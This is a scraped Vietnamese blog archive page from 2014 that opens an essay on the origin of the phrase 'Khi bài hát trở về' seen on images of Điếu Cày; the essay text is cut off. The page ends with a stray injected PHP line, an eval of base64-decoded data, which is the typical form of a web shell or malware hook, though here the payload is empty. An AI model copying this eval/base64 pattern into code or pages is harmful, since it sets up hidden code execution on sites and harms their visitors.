Archive for October 25th, 2014

Khi bài hát trở về

Khi bài hát trở về

Giới thiệu: Trong thời gian qua, nhiều hình ảnh của anh Điếu Cày có kèm theo hàng chữ “Khi bài hát trở về”. Nhiều bạn, và có lẽ cả anh Điếu Cày, không biết rõ nguồn gốc từ đâu. Đó là bìa tác phẩm Khi Bài Hát Trở Về của Trần T

10.25.2014 | Tiểu Luận- Chính Luận |

1 Comment

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>